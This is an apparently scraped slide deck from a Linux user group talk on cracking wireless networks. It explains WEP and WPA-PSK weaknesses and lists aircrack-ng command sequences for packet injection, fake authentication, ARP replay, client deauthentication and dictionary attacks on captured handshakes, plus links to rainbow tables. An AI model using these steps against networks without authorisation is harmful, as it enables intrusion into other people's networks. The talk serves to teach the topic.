cracking wireless
play

Cracking Wireless Ryan Curtin LUG@GT Ryan Curtin Cracking - PowerPoint PPT Presentation

Cracking Wireless Ryan Curtin LUG@GT Ryan Curtin Cracking Wireless - p. 1 Goals By the end of this presentation (if you stay awake), you will: Goals Setting Up Checking Injection Understand the different types of wireless keys


  1. Cracking Wireless Ryan Curtin LUG@GT Ryan Curtin Cracking Wireless - p. 1

  2. Goals By the end of this presentation (if you stay awake), you will: » Goals » Setting Up » Checking Injection � Understand the different types of wireless keys as well as WEP their advantages and disadvantages WPA � Understand the legal ramifications of cracking wireless keys Questions and Comments? � Have a basic idea of the theory behind the cracking of each key type � Know how to use software to crack wireless keys Ryan Curtin Cracking Wireless - p. 2

  3. Setting Up Most of the work can be done with the aircrack-ng package. » Goals » Setting Up » Checking Injection None of these attacks can be performed if you are using WEP ndiswrapper for your network drivers, or other drivers that do WPA not support promiscuous (or monitor) mode. Questions and Comments? Starting / stopping promiscuous mode: airmon-ng stop wlan0 airmon-ng check wlan0 airmon-ng start wlan0 <channel> Ryan Curtin Cracking Wireless - p. 3

  4. Checking Injection Before starting, make sure your card can inject packets into an » Goals » Setting Up AP! » Checking Injection WEP aireplay-ng -9 -e <ESSID> -a <MAC> wlan0 WPA Make sure the percentage of ping replies is not incredibly Questions and Comments? small, otherwise it may be difficult to collect data. Ryan Curtin Cracking Wireless - p. 4

  5. WEP Encryption The slide title is not redundant! WEP stands for ’wired » Goals » Setting Up equivalent privacy’, not ’wireless encryption protocol’. » Checking Injection WEP � 64-bit or 128-bit keys » WEP Encryption » Cracking WEP » Using aircrack-ng � Uses RC4 stream cipher with CRC-32 checksum » Using aircrack-ng (2) WPA � Keys have 24-bit IV (initialization vector) Questions and Comments? � 2 2 4 (16 million) possible IVs � 50% probability of repeated IV after only 5000 packets Ryan Curtin Cracking Wireless - p. 5

  6. Cracking WEP Different methods have been developed: » Goals » Setting Up » Checking Injection � 2001 : Fluhrer, Mantin, and Shamir publish WEP flaws and a WEP passive attack » WEP Encryption » Cracking WEP » Using aircrack-ng � 2005 : FBI demonstrates WEP cracking in three minutes » Using aircrack-ng (2) WPA � 2006 : Bittau, Handley, and Lackey show that active attacks Questions and Comments? are possible � 2007 : Pychine, Tews, and Weinmann optimize active attack (“PTW” attack) Ryan Curtin Cracking Wireless - p. 6

  7. Using aircrack-ng 1. Gather important data: access point MAC, ESSID, channel » Goals » Setting Up airodump-ng wlan0 » Checking Injection WEP 2. Start capture of IVs » WEP Encryption » Cracking WEP airodump-ng -c <channel> -bssid <MAC> -w » Using aircrack-ng » Using aircrack-ng (2) <outputfile> wlan0 WPA Leave this running! You want to capture around 50k IVs Questions and Comments? to ensure success (maybe more) 3. Fake authentication with AP aireplay-ng -1 0 -e <ESSID> -a <MAC> wlan0 Ryan Curtin Cracking Wireless - p. 7

  8. Using aircrack-ng (2) » Goals 4 Reinject ARP packets to get more IVs » Setting Up » Checking Injection aireplay-ng -3 -b <MAC> wlan0 WEP Run until you have a substantial number of IVs (in your » WEP Encryption » Cracking WEP airodump-ng process) » Using aircrack-ng » Using aircrack-ng (2) 5 Crack the key! WPA FMS attacks (slow): aircrack-ng -f 1 -F Questions and Comments? <capture>.cap PTW attacks ( fast! ): aircrack-ng -P 2 <capture>.cap Ryan Curtin Cracking Wireless - p. 8

  9. WPA Encryption WPA with TKIP appeared as an interim solution to the WEP » Goals » Setting Up problem while 802.11i was prepared; 802.11i is WPA2. » Checking Injection WEP � WPA: ‘Wi-Fi Protected Access’ WPA � TKIP: ‘Temporal Key Integrity Protocol’ » WPA Encryption » Cracking WPA-PSK » Using aircrack-ng � TKIP also uses RC4 cipher (for legacy WEP hardware) » Rainbow Tables Questions and Comments? Use AES instead if possible! � IV length increased to 48 bits � WPA-PSK (pre-shared key): common consumer environment setup Ryan Curtin Cracking Wireless - p. 9

  10. Cracking WPA-PSK The WPA PSK initialization process is reproducible! » Goals » Setting Up » Checking Injection WEP Therefore, we must capture a WPA handshake and then try to WPA » WPA Encryption replicate it. » Cracking WPA-PSK » Using aircrack-ng » Rainbow Tables Questions and Comments? Ryan Curtin Cracking Wireless - p. 10

  11. Using aircrack-ng 1. Gather important data: access point MAC, ESSID, channel; » Goals » Setting Up optional: ESSID of connected client » Checking Injection airodump-ng wlan0 WEP WPA 2. Start capture of handshakes » WPA Encryption » Cracking WPA-PSK airodump-ng -c <channel> -bssid <MAC> -w » Using aircrack-ng » Rainbow Tables <outputfile> wlan0 Questions and Comments? Leave this running! Watch for WPA handshake: xx:xx:xx:xx:xx:xx 3. (Optional) Fake deauthentication of client to trigger handshake aireplay-ng -0 1 -a <AP MAC> -c <client MAC> wlan0 Watch for successful ACK in program output 4. Brute-force attack saved handshake aircrack-ng -w <dictionary> -b <MAC> <output capture> Ryan Curtin Cracking Wireless - p. 11

  12. Rainbow Tables Rainbow Tables : a giant collection of potential common » Goals » Setting Up passphrases » Checking Injection WEP Available from: WPA » WPA Encryption � Church of Wifi Rainbow Tables : » Cracking WPA-PSK » Using aircrack-ng http://www.renderlab.net/projects/WPA-tables/ » Rainbow Tables Questions and Comments? � The Schmoo Group : http://rainbowtables.shmoo.com/ � Google Search : http://www.google.com/#q=wpa+rainbow+tables Ryan Curtin Cracking Wireless - p. 12

  13. Questions and Comments? » Goals » Setting Up » Checking Injection WEP WPA Questions and Comments? » Questions and Comments? Ryan Curtin Cracking Wireless - p. 13

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend


More recommend